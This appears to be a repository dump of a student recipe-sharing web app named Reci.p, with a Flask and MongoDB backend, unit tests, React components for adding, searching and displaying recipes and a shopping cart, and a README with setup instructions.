https://github.com/therodesun/recipes.io
|
4c3f0cf51656c99e681076c615cab3af7d6dab9d
|
aa66dfe604db130b904b7d30ea5c801ac62cee22
|
e2e0f5a4037656126a1fb06e8a556a5c318fb005
|
refs/heads/main
| 2023-04-06T03:26:17.769304 | 2021-03-16T00:31:13 | 2021-03-16T00:31:13 | 335,783,658 | 1 | 0 | null | 2021-02-03T23:31:28 | 2021-03-06T10:41:25 | 2021-03-06T10:42:58 |
Python
|
[
{
"alpha_fraction": 0.5808709263801575,
"alphanum_fraction": 0.5867029428482056,
"avg_line_length": 33.2933349609375,
"blob_id": "38ee1aef0eb7311305d7ca400b9d48da8004ed5e",
"content_id": "1bd1ecea45cd272927a23ed2ed54dc0b7629e3a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2572,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 75,
"path": "/backend/model.py",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import pymongo\nfrom bson import ObjectId\n\nclass Model(dict):\n \"\"\"\n A simple model that wraps mongodb document\n \"\"\"\n __getattr__ = dict.get\n __delattr__ = dict.__delitem__\n __setattr__ = dict.__setitem__\n\n def save(self):\n if not self._id:\n self.collection.insert_one(self)\n self._id = str(self._id)\n\n\nclass Recipe(Model):\n db_client = pymongo.MongoClient('localhost', 27017) #change if your db is in another host and port\n collection = db_client['users'][\"recipes\"]\n \n def find_all(self):\n recipes = list(self.collection.find())\n for recipe in recipes:\n recipe[\"_id\"] = str(recipe[\"_id\"])\n return recipes\n \n def find_name(self, name):\n recipes = list(self.collection.find({\"name\":name}))\n for recipe in recipes: \n recipe[\"_id\"] = str(recipe[\"_id\"])\n return recipe\n \n def clearAll(self):\n for recipe in list(self.collection.find()):\n resp = self.collection.delete_one({\"_id\": recipe[\"_id\"]})\n return resp\n \n def update(self, recipe):\n return self.collection.update_one({'name' : recipe['name']}, { '$set': { 'name' : recipe['name'], 'ingredients' : recipe['ingredients'], 'steps' : recipe['steps'], 'time': recipe['time'], 'imageURL' : recipe['imageURL'] }})\n \n def deleteby_name(self, name):\n return self.collection.delete_one({'name' : name})\n\nclass Shopping(Model):\n db_client = pymongo.MongoClient('localhost', 27017) #change if your db is in another host and port\n collection = db_client['users'][\"shopping\"]\n \n def find_all(self):\n ingredients = list(self.collection.find())\n for ingredient in ingredients:\n ingredient[\"_id\"] = str(ingredient[\"_id\"])\n return ingredients\n \n def clearAll(self):\n resp = None\n for ingredient in list(self.collection.find()):\n resp = self.collection.delete_one({\"_id\": ingredient[\"_id\"]})\n return resp\n\nclass MyRecipes(Model):\n db_client = pymongo.MongoClient('localhost', 27017) #change if your db is in another host and port\n collection = db_client['users'][\"myrecipes\"]\n \n def find_all(self):\n recipes = list(self.collection.find())\n for recipe in recipes:\n recipe[\"_id\"] = str(recipe[\"_id\"])\n return recipes\n\n def clearAll(self):\n resp = None\n for recipe in list(self.collection.find()):\n resp = self.collection.delete_one({\"_id\": recipe[\"_id\"]})\n return resp\n"
},
{
"alpha_fraction": 0.5059612393379211,
"alphanum_fraction": 0.5136612057685852,
"avg_line_length": 26.387754440307617,
"blob_id": "e96c29ada088b6bb8a67cac4e5cdbc2a26d5c364",
"content_id": "e4fdf9816f19cce311d2deb0f7df4eae812781a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4026,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 147,
"path": "/ui/src/AddRecipe/AddRecipe.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\nimport Table from './Table';\nimport Form from './Form';\nimport Table2 from './Table2';\nimport Form2 from './Form2';\nimport axios from \"axios\";\n\nclass AddRecipe extends Component {\n\n // submit recipe\n makePostCall(recipe){\n const { name } = this.state;\n return axios.post('http://localhost:5000/recipes', recipe)\n .then(function (response) {\n console.log(response);\n if (response.status === 201) {\n sendName(name);\n } else {\n return false;\n }\n })\n .catch(function (error) {\n console.log(error);\n return false;\n });\n }\n\n initialState = {\n ingredients: [],\n steps: [],\n name: \"\",\n time: \"\",\n imageURL: \"\",\n response:true,\n }\n \n state = this.initialState\n\n handleChange = event => {\n const { name, value } = event.target\n\n this.setState({\n [name]: value,\n })\n }\n\n removeInstruction = index => {\n const { steps } = this.state\n\n this.setState({\n steps: steps.filter((instruction, i) => {\n return i !== index\n }),\n })\n }\n \n removeIngredient = index => {\n const { ingredients } = this.state\n\n this.setState({\n ingredients: ingredients.filter((ingredient, i) => {\n return i !== index\n }),\n })\n }\n\n // submit ingredients\n handleSubmit = ingredient => {\n this.setState({ ingredients: [...this.state.ingredients, ingredient] });\n }\n \n // submit instructions\n handleSubmit2 = instruction => {\n this.setState({ steps: [...this.state.steps, instruction.step] });\n }\n \n // submit recipe changes\n handleSubmit3 = () => {\n this.makePostCall(this.state);\n }\n\n // delete ingredient\n handleDelete = (ingredient, index) => {\n this.removeIngredient(index);\n }\n \n // delete instruction\n handleDelete2 = (instruction, index) => {\n this.removeInstruction(index);\n }\n\n render() {\n const { ingredients, steps, name, time, imageURL } = this.state\n\n return (\n <div className=\"container\">\n <form>\n <label htmlFor=\"ingredient\">Recipe Name</label>\n <input\n type=\"text\"\n name=\"name\"\n id=\"name\"\n value={name}\n onChange={this.handleChange} />\n <label htmlFor=\"amount\">Duration</label>\n <input\n type=\"text\"\n name=\"time\"\n id=\"time\"\n value={time}\n onChange={this.handleChange} />\n <label htmlFor=\"imageURL\">Image Link</label>\n <input\n type=\"text\"\n name=\"imageURL\"\n id=\"imageURL\"\n value={imageURL}\n onChange={this.handleChange} />\n </form>\n <h3>Ingredients</h3>\n <Table ingredientData={ingredients} remove={this.handleDelete} />\n <Form handleSubmit={this.handleSubmit} />\n <h3>Instructions</h3>\n <Table2 instructionData={steps} remove={this.handleDelete2} />\n <Form2 handleSubmit={this.handleSubmit2} />\n <button id=\"cancelButton\">Cancel</button>\n <button id=\"submitButton\" onClick={this.handleSubmit3}>Submit</button>\n </div>\n )\n }\n}\n\n// load recipe in database cache for recipe page\nfunction sendName(name) {\n const nameURL = encodeURIComponent(name);\n axios.get('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/RecipePage\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n}\n\nexport default AddRecipe\n"
},
{
"alpha_fraction": 0.4743150770664215,
"alphanum_fraction": 0.4743150770664215,
"avg_line_length": 24.434782028198242,
"blob_id": "c3d4e2f18c79aae69e70d701e0b03043ad51c814",
"content_id": "a09bffbb7f5eae499ce1ef502247e9d02423f299",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 584,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 23,
"path": "/ui/src/Home/Search.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\n\nclass Search extends Component {\n state = { }\n render() { \n return ( \n <form action=\"RecipeTable/\" method=\"get\">\n <label id=\"searchTitle\" for=\"header-search\">\n Search Recipes\n </label>\n <input\n type=\"text\"\n id=\"header-search\"\n name=\"s\"\n placeholder=\"Enter Recipe Name\"\n />\n <button type=\"submit\" id=\"searchSubmit\">Search</button>\n </form> \n );\n }\n}\n \nexport default Search;"
},
{
"alpha_fraction": 0.763805091381073,
"alphanum_fraction": 0.780510425567627,
"avg_line_length": 43.89583206176758,
"blob_id": "7a2e557e13728d2e37713b4c8ac61ded4364d72b",
"content_id": "c4522d5e7f877fa02d57f2a3186a2729b7f2cd0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2155,
"license_type": "no_license",
"max_line_length": 550,
"num_lines": 48,
"path": "/README.md",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "# recipes.io\nCSC307 Project\n\nreci.p is an app designed to store recipes that users have created. On the app users can add their own recipes to a database, and then search through the database to find recipes. Users can view all recipes in a table page, where an image, name, and the time to make the recipe are displayed. By clicking on these recipes, users are taken to recipe pages, where they can view the ingredients and instructions to create the dish. Users can also click on a button to add all the ingredients to a shopping cart, where they can view what they need to buy\n\nProject CI Page: https://travis-ci.com/github/therodesun/recipes.io\n\n**Diagrams**\n\nUI Prototype: https://www.figma.com/file/KyD6pFxzOh6RtUUyBgult2/Reci.P?node-id=0%3A1 Last Updated: 2/3/21\n\nUML Use Diagram: https://app.diagrams.net/#G1k5-pMzCaIBLEzz-6L6kYaYBWmw1fH75a Last Updated: 3/8/21\n\nUML Class Diagram: https://app.diagrams.net/#G16uo9sK-sCjnR-Nszxf3Au21kKtAxGJUk Last Updated: 2/8/21\n\n**Linters**\n\nPycodestyle - in command line, execute the following command: pip install pycodestyle\n\nPrettier - open extensions tab in VS Code and search \"Prettier,\" install the first result\n\n**Development Environment Setup**\n\nFront end: Install npm/node.js https://nodejs.org/en/download/\n\nBack end: Install python's flask library https://flask.palletsprojects.com/en/1.1.x/installation/\n\nConnecting the front and back: Install the javascript axios library by running the command 'npm install axios' in the front end folder. Additioanlly, install the flask-cors library in the back end folder by running the command 'pip install flask-cors'\n\nDatabase: Install MongoDB. Windows: https://docs.mongodb.com/manual/tutorial/install-mongodb-on-windows/ Mac: https://github.com/mongodb/homebrew-brew Linux: https://docs.mongodb.com/manual/administration/install-on-linux/\n\nIn order to connect the database with the backend, install pymongo in the python virtual environment of the backend by running 'pip install pymongo' in command line\n\n**To run the project**\n\nFront end: \n\n* cd /recipes.io/ui\n\n* npm start\n\nBack end:\n\n* cd /recipes.io/backend\n\n* export FLASK_APP=recipe.py\n\n* flask run\n"
},
{
"alpha_fraction": 0.4855305552482605,
"alphanum_fraction": 0.5100482106208801,
"avg_line_length": 34.55714416503906,
"blob_id": "ef18fe8c014ccfe33bab20edcad86973da6bbd48",
"content_id": "2f903876f59cb4d71fbc34182c63f044289b9c6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2488,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 70,
"path": "/ui/src/Home/Carousel.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\nimport { Button } from 'react-bootstrap';\nimport history from './../history';\nimport axios from 'axios'\n\nfunction sendName(name) {\n const nameURL = encodeURIComponent(name);\n axios.get('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/RecipePage\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n}\n\nclass Carousel extends Component {\n state = {\n recipes: [],\n response:false\n }\n componentDidMount() {\n axios.get('http://localhost:5000/recipes')\n .then(res => {\n const recipes = res.data.recipes_list;\n this.setState({ recipes: recipes, response: true });\n })\n .catch(function (error) {console.log(error);}\n );\n }\n\n render() { \n if (!(this.state.response)){\n return <div id=\"loadingbar\">No Recipes to Display</div>\n }\n const {recipes} = this.state;\n // get two random indices\n var rand1 = Math.floor(Math.random() * (recipes.length));\n var rand2 = Math.floor(Math.random() * (recipes.length));\n if (rand1 == rand2) {\n // prevent duplicate index\n if (rand1 + 1 < recipes.length) {\n rand1 = rand1 + 1;\n } else if (rand1 - 1 >= 0) {\n rand1 = rand1 - 1;\n }\n }\n return ( \n <div>\n <h2 id = \"recommend\">\n Recommended Recipes\n </h2>\n <Button id=\"carousel1\" variant=\"btn btn-success\" onClick={() => sendName(recipes[rand1].name)}>\n <div id = \"carousel\">\n <img class = \"class\" alt = 'https://c.ndtvimg.com/2020-01/n7thfo2o_spaghetti_625x300_28_January_20.jpg' src = {recipes[rand1].imageURL} id=\"image\"></img>\n </div>\n </Button>\n <Button id=\"carousel2\" variant=\"btn btn-success\" onClick={() => sendName(recipes[rand2].name)}>\n <div id = \"carousel\">\n <img class = \"class\" alt = 'https://static.toiimg.com/photo/53110049.cms' src = {recipes[rand2].imageURL} id=\"image\"></img>\n </div>\n </Button>\n </div>\n );\n }\n}\n \nexport default Carousel;"
},
{
"alpha_fraction": 0.49494948983192444,
"alphanum_fraction": 0.4983164966106415,
"avg_line_length": 19.517240524291992,
"blob_id": "511d65f48719b1b8a6f94aee35bfaa954df695b2",
"content_id": "0ae9ffd09342d049d0e0b100a575265546de0185",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 29,
"path": "/ui/src/Home/Home.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport \"./Home.css\";\nimport Search from \"./Search.js\"\nimport Carousel from \"./Carousel.js\"\nimport img from \"./recipe.png\"\nexport default class Home extends Component {\n \n render() {\n \n return (\n <div className=\"Home\">\n <div className=\"lander\">\n <h1 id=\"titleRecip\">Welcome to Reci.p!</h1>\n <Search/>\n <Carousel/>\n </div>\n <div id = \"logoImagediv\">\n <img \n id=\"imageLogo\"\n src= {img} \n alt=\"new\"\n />\n </div>\n \n </div>\n \n );\n }\n}"
},
{
"alpha_fraction": 0.5099760293960571,
"alphanum_fraction": 0.5163607597351074,
"avg_line_length": 25.10416603088379,
"blob_id": "c7584566dc312f43ffe02cf1085c0458e5b45c4a",
"content_id": "6bf05b5e3f9c937d067c90ca9fd369b3f56a3c77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1253,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 48,
"path": "/ui/src/TablePage/TablePage.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\nimport Table from './RecipeTable';\nimport './index.css'\nimport axios from \"axios\";\n\nclass TablePage extends Component {\n state = {\n recipes: [],\n }\n \n // get all recipes\n componentDidMount() {\n axios.get('http://localhost:5000/recipes')\n .then(res => {\n const recipes = res.data.recipes_list;\n this.setState({ recipes });\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n }\n render() {\n const {recipes} = this.state\n const param = new URLSearchParams(window.location.search).get('s');\n if (param != null) {\n return (\n <div className=\"container\">\n <h1>Recipe Table</h1>\n <Table recipeData = {recipes.filter(function(recipe) {\n return recipe[\"name\"].toLowerCase().includes(param.toLowerCase());\n })} />\n </div>\n )\n } else {\n return (\n <div className=\"container\">\n <h1>Recipe Table</h1>\n <Table recipeData = {recipes} />\n </div>\n )\n }\n };\n \n}\n\n\nexport default TablePage\n"
},
{
"alpha_fraction": 0.5946717262268066,
"alphanum_fraction": 0.5946717262268066,
"avg_line_length": 37.925926208496094,
"blob_id": "6589b42b34b72a9eb2144830cf412b7726229ead",
"content_id": "a64457439fe7c2659555381e7cd5e3bf548b76aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1051,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 27,
"path": "/ui/src/Routes.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport { Router, Switch, Route } from \"react-router-dom\";\n\nimport TablePage from \"./TablePage/TablePage\";\nimport Home from \"./Home/Home\";\nimport history from './history';\nimport RecipePage from './RecipePage/RecipePage';\nimport ShoppingCart from './ShoppingCart/ShoppingCart';\nimport AddRecipe from './AddRecipe/AddRecipe';\nimport EditRecipe from './RecipePage/EditRecipe';\n\nexport default class Routes extends Component {\n render() {\n return (\n <Router history={history}>\n <Switch>\n <Route path=\"/\" exact component={Home} />\n <Route path=\"/RecipeTable\" component={TablePage} />\n <Route path=\"/RecipePage\" component={RecipePage} />\n <Route path=\"/ShoppingCart\" component={ShoppingCart} />\n <Route path=\"/AddRecipe\" component={AddRecipe} />\n <Route path=\"/EditRecipe\" component={EditRecipe} />\n </Switch>\n </Router>\n )\n }\n}\n"
},
{
"alpha_fraction": 0.6091954112052917,
"alphanum_fraction": 0.6120689511299133,
"avg_line_length": 21.45161247253418,
"blob_id": "c4f14929b32d665f8450ea195a7106a9b6ab9e1f",
"content_id": "7e2b0fb5529f26c1883631a884d08a7077519ef8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 31,
"path": "/ui/src/RecipePage/InstructionsList.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\n\nconst ListBody2 = props => {\n const rows = props.recipeData.map((row, index) => {\n return (\n <li key={index}>{row}</li>\n )\n })\n\n return <ol id=\"instr_list\">{rows}</ol>\n}\n\nclass InstructionsList extends Component {\n render() {\n // Should temporarily be a fixed list on front end\n const { recipeData } = this.props // Using recipeData as variable name to pass through data from databases\n\n return (\n <ListBody2 recipeData = {recipeData} />\n )\n }\n}\n\nexport default InstructionsList\n\n// Put in display page\n// return (\n// <div className=\"container\">\n// <Table recipeData={recipes} />\n// </div>\n//)\n"
},
{
"alpha_fraction": 0.5941481590270996,
"alphanum_fraction": 0.6106653809547424,
"avg_line_length": 31.3435115814209,
"blob_id": "cd1a2897e5721d84755208c52c340943186ce94b",
"content_id": "bd3b735a3dfd3a2e29727528b9d2d6f9dd5b599f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4238,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 131,
"path": "/backend/recipe.py",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "\nfrom flask import Flask\nfrom flask import request\nfrom flask import jsonify\nimport json\n# for linking frontend-backend\nfrom flask_cors import CORS\n\n# for random ids \n# import random \n# import string\n\n# for mongo db\nfrom model import Recipe\nfrom model import Shopping\nfrom model import MyRecipes\n\n\napp = Flask(__name__)\n#CORS stands for Cross Origin Requests.\n#Here we'll allow requests coming from any domain. Not recommended for production environment.\nCORS(app)\n\n# create list \nrecipe = {\n 'recipes_list':[]\n}\n\n\nshopping = {\n 'ingredients':[]\n}\n\nmyrecipes = {\n 'recipes':[]\n}\n\ncurrentRecipe = None\n\[email protected]('/recipes', methods=['GET', 'POST', 'DELETE'])\ndef get_recipes():\n if request.method == 'GET':\n recipes = Recipe().find_all()\n if recipes is not None and len(recipes) > 0:\n return jsonify({\"recipes_list\": recipes}), 200\n return jsonify({\"error\": \"recipe not found\"}), 404\n elif request.method == 'POST':\n recipeToAdd = request.get_json()\n newRecipe = Recipe(recipeToAdd)\n newRecipe.save()\n if \"name\" in recipeToAdd:\n resp = jsonify(newRecipe), 201\n else:\n resp = jsonify({\"error\": \"something went wrong\"}), 400\n return resp\n elif request.method == 'DELETE':\n Recipe().clearAll()\n return jsonify({\"success\":\"entries cleared\"}), 200\n\n# implement search by recipe name \[email protected]('/recipes/<name>', methods=['GET', 'DELETE'])\ndef get_recipes_name(name):\n if request.method == 'GET':\n recipe = Recipe().find_name(name)\n if recipe is not None and len(recipe) != 1:\n global currentRecipe\n currentRecipe = recipe\n resp = jsonify({\"success\":\"recipe loaded into cache\"}), 200\n return resp\n else:\n return jsonify({\"error\":\"recipe not found\"}), 404\n if request.method == 'DELETE':\n Recipe().deleteby_name(name)\n resp = jsonify({\"success\":\"recipe delete\"}), 200\n return resp\n\[email protected]('/recipe', methods=['GET'])\ndef get_current():\n global currentRecipe\n if currentRecipe is not None:\n return jsonify(currentRecipe), 200\n return jsonify({\"error\":\"recipe not found\"}), 404\n\[email protected]('/myrecipes', methods=['GET', 'POST', 'DELETE'])\ndef get_myrecipes():\n if request.method == 'GET':\n recipes = MyRecipes().find_all()\n if recipes is not None and len(recipes) > 0:\n return jsonify({\"recipes_list\": recipes}), 200\n else:\n return jsonify({\"error\":\"recipes not found\"}), 404\n elif request.method == 'POST':\n recipeToAdd = request.get_json()\n if \"name\" not in recipeToAdd:\n resp = jsonify({\"error\": \"something went wrong\"}), 400\n return resp\n newRecipe = MyRecipes(recipeToAdd)\n newRecipe.save()\n resp = jsonify(newRecipe), 201\n return resp\n elif request.method == 'DELETE':\n MyRecipes().clearAll()\n return jsonify({\"success\":\"entries cleared\"}), 200\n\[email protected]('/shopping', methods=['GET', 'POST', 'DELETE'])\ndef get_ingredients():\n if request.method == 'GET':\n ingredients = Shopping().find_all()\n if ingredients is not None and len(ingredients) > 0:\n return jsonify({\"ingredients\": ingredients}), 200\n else:\n return jsonify({\"error\":\"ingredients not found\"}), 404\n elif request.method == 'POST':\n temp = request.get_json()\n if \"ingredients\" in temp:\n ingredientsToAdd = temp[\"ingredients\"]\n for ingredient in ingredientsToAdd:\n newRecipe = Shopping(ingredient)\n newRecipe.save()\n return jsonify({\"success\":\"ingredients added\"}), 201\n return jsonify({\"error\": \"something went wrong\"}), 400\n elif request.method == 'DELETE':\n Shopping().clearAll()\n return jsonify({\"success\":\"entries cleared\"}), 200\n \[email protected]('/update', methods=['POST'])\ndef update_recipe():\n recipe = request.get_json()\n if recipe is not None and \"name\" in recipe:\n newRecipe = Recipe().update(recipe)\n return jsonify({\"success\":\"recipe updated\"}), 201\n return jsonify({\"error\":\"recipe not updated\"}), 400\n"
},
{
"alpha_fraction": 0.5488215684890747,
"alphanum_fraction": 0.5675504803657532,
"avg_line_length": 41.04867172241211,
"blob_id": "dbf1c4a70ad62cd185fc55c86d6e1f5b93289faf",
"content_id": "cd184df57830089f3c73551f11ca21aadd8312bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9504,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 226,
"path": "/backend/testing.py",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom flask import json\nimport flask_unittest\nfrom recipe import app\n\nclass TestStringMethods(unittest.TestCase):\n # clear for first test to prep for others\n def test1_clear(self):\n tester = app.test_client(self)\n tester.delete('/shopping')\n tester.delete('/myrecipes')\n tester.delete('/recipes')\n \n def test1_recipe_get_fail(self):\n tester = app.test_client(self)\n response = tester.get('/recipes')\n self.assertEqual(response.status_code,404)\n \n def test1_get_recipe_cached_fail(self):\n tester = app.test_client(self)\n response = tester.get('/recipe')\n self.assertEqual(response.status_code, 404)\n \n # test for post recipe list \n def test2_add_recipe(self):\n tester = app.test_client(self)\n response = tester.post('/recipes',json={\n \"name\": \"Roasted Asparagus\",\n \"time\": \"40 minutes\",\n \"ingredients\": [\n {\n \"quantity\": \"1 lb\",\n \"name\": \" asparagus\"\n },\n {\n \"quantity\": \"1 1/2 tbsp\",\n \"name\": \"olive oil\"\n },\n {\n \"quantity\": \"1/2 tsp\",\n \"name\": \"kosher salt\"\n }\n ],\n \"steps\": [\n \"Preheat oven to 4258F.\",\n \"Cut off the woody bottom part of the asparagus spears and discard.\",\n \"With a vegetable peeler, peel off the skin on the bottom 2-3 inches of the spears (this keeps the asparagus from being all.\\\",string.\\\", and if you eat asparagus you know what I mean by that).\",\n \"Place asparagus on foil-lined baking sheet and drizzle with olive oil.\",\n \"Sprinkle with salt.\",\n \"With your hands, roll the asparagus around until they are evenly coated with oil and salt.\",\n \"Roast for 10-15 minutes, depending on the thickness of your stalks and how tender you like them.\",\n \"They should be tender when pierced with the tip of a knife.\",\n \"The tips of the spears will get very brown but watch them to prevent burning.\",\n \"They are great plain, but sometimes I serve them with a light vinaigrette if we need something acidic to balance out our meal.\"\n ],\n \"imageURL\": \"http://img.sndimg.com/food/image/upload/w_266/v1/img/recipes/50/84/7/picMcSyVd.jpg\",\n \"originalURL\": \"http://www.food.com/recipe/roasted-asparagus-50847\",\n \"response\":\"true\"\n }, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,201)\n json_response = json.loads(response.get_data(as_text=True))\n \n def test2_add_recipe_fail(self):\n tester = app.test_client(self)\n response = tester.post('/recipes',json={}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,400)\n\n # test for printing recipes list\n def test2_show_recipes(self):\n tester = app.test_client(self)\n response = tester.get('/recipes')\n self.assertEqual(response.status_code,200)\n\n # Testing if get returns the right page\n # need to post the data first\n def test2_find_recipe(self):\n tester = app.test_client(self)\n response = tester.get('/recipes/Roasted%20Asparagus')\n self.assertEqual(response.status_code, 200)\n json_response = json.loads(response.get_data(as_text=True))\n \n def test2_get_recipe_cached(self):\n tester = app.test_client(self)\n response = tester.get('/recipe')\n self.assertEqual(response.status_code, 200)\n\n # Testing proper error code \n def test2_no_Recipe(self):\n tester = app.test_client(self)\n response = tester.get('/recipes/nonexistentrecipe1213123123123')\n self.assertEqual(response.status_code, 404)\n\n # Testing update recipe\n def test3_update(self):\n tester = app.test_client(self)\n response = tester.post('/update', json={\n \"name\": \"Roasted Asparagus\",\n \"time\": \"30 minutes\",\n \"ingredients\": [\n {\n \"quantity\": \"1 lb\",\n \"name\": \" asparagus\"\n },\n {\n \"quantity\": \"1 1/2 tbsp\",\n \"name\": \"olive oil\"\n },\n {\n \"quantity\": \"1/2 tsp\",\n \"name\": \"kosher salt\"\n }\n ],\n \"steps\": [\n \"Preheat oven to 4258F.\",\n \"Cut off the woody bottom part of the asparagus spears and discard.\",\n \"With a vegetable peeler, peel off the skin on the bottom 2-3 inches of the spears (this keeps the asparagus from being all.\\\",string.\\\", and if you eat asparagus you know what I mean by that).\",\n \"Place asparagus on foil-lined baking sheet and drizzle with olive oil.\",\n \"Sprinkle with salt.\",\n \"With your hands, roll the asparagus around until they are evenly coated with oil and salt.\",\n \"Roast for 10-15 minutes, depending on the thickness of your stalks and how tender you like them.\",\n \"They should be tender when pierced with the tip of a knife.\",\n \"The tips of the spears will get very brown but watch them to prevent burning.\",\n \"They are great plain, but sometimes I serve them with a light vinaigrette if we need something acidic to balance out our meal.\"\n ],\n \"imageURL\": \"http://img.sndimg.com/food/image/upload/w_266/v1/img/recipes/50/84/7/picMcSyVd.jpg\",\n \"originalURL\": \"http://www.food.com/recipe/roasted-asparagus-50847\",\n \"response\":\"true\"\n })\n self.assertEqual(response.status_code, 201)\n\n # Testing update recipe error\n def test3_update_fail(self):\n tester = app.test_client(self)\n response = tester.post('/update', json={})\n self.assertEqual(response.status_code, 400)\n \n # test when we return empty myrecipes \n def test3_myrecipe_get_fail(self):\n tester = app.test_client(self)\n response = tester.get('/myrecipes')\n self.assertEqual(response.status_code,404)\n \n def test4_myrecipe_post(self):\n tester = app.test_client(self)\n response = tester.post('/myrecipes',json={\"name\":\"egg\",\"time\":\"15 min\"}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,201)\n \n def test4_myrecipe_post_fail(self):\n tester = app.test_client(self)\n response = tester.post('/myrecipes',json={}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,400)\n \n #test my recipes\n def test5_myrecipe_get(self):\n tester = app.test_client(self)\n response = tester.get('/myrecipes')\n self.assertEqual(response.status_code,200)\n \n def test6_myrecipe_delete(self):\n tester = app.test_client(self)\n response = tester.delete('/myrecipes')\n self.assertEqual(response.status_code,200)\n #test shopping\n\n def test6_shopping_post_fail(self):\n tester = app.test_client(self)\n response = tester.post('/shopping',json={}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,400)\n \n def test6_shopping_get_fail(self):\n tester = app.test_client(self)\n response = tester.get('/shopping')\n self.assertEqual(response.status_code,404)\n \n def test7_shopping_post(self):\n tester = app.test_client(self)\n response = tester.post('/shopping',json={\"ingredients\": [\n {\n \"quantity\": \"1 lb\",\n \"name\": \" asparagus\"\n },\n {\n \"quantity\": \"1 1/2 tbsp\",\n \"name\": \"olive oil\"\n },\n {\n \"quantity\": \"1/2 tsp\",\n \"name\": \"kosher salt\"\n }\n ]}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,201)\n \n def test8_shopping_get(self):\n tester = app.test_client(self)\n response = tester.get('/shopping')\n self.assertEqual(response.status_code,200)\n response = tester.delete('/shopping')\n \n def test9_shopping_delete(self):\n tester = app.test_client(self)\n response = tester.delete('/shopping')\n self.assertEqual(response.status_code,200)\n\n # Test delete by name \n def test9_delete_name(self):\n tester = app.test_client(self)\n response = tester.post('/recipes',json={\"name\":\"hamburger\", \"time\":\"15 min\"}, content_type='application/json',\n follow_redirects=True)\n response = tester.delete('/recipes/hamburger')\n self.assertEqual(response.status_code, 200)\n\n # test delete\n def test9_delete(self):\n tester = app.test_client(self)\n response = tester.delete('/recipes')\n self.assertEqual(response.status_code, 200)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n"
},
{
"alpha_fraction": 0.6132208108901978,
"alphanum_fraction": 0.6132208108901978,
"avg_line_length": 21.935483932495117,
"blob_id": "1a8a0eb8a05f09da600bf10d511632fa17dfa5db",
"content_id": "3eb54ffe018847c9cddc184c7c4ce77cc03714d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 711,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 31,
"path": "/ui/src/RecipePage/IngredientsList.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\n\nconst ListBody = props => {\n const rows = props.recipeData.map((row, index) => {\n return (\n <li key={index}>{row.quantity} {row.name}</li>\n )\n })\n\n return <ul id=\"ingr_list\">{rows}</ul>\n}\n\nclass IngredientsList extends Component {\n render() {\n // Should temporarily be a fixed list on front end\n const { recipeData } = this.props // Using recipeData as variable name to pass through data from databases\n\n return (\n <ListBody recipeData = {recipeData} />\n )\n }\n}\n\nexport default IngredientsList\n\n// Put in display page\n// return (\n// <div className=\"container\">\n// <Table recipeData={recipes} />\n// </div>\n//)\n"
},
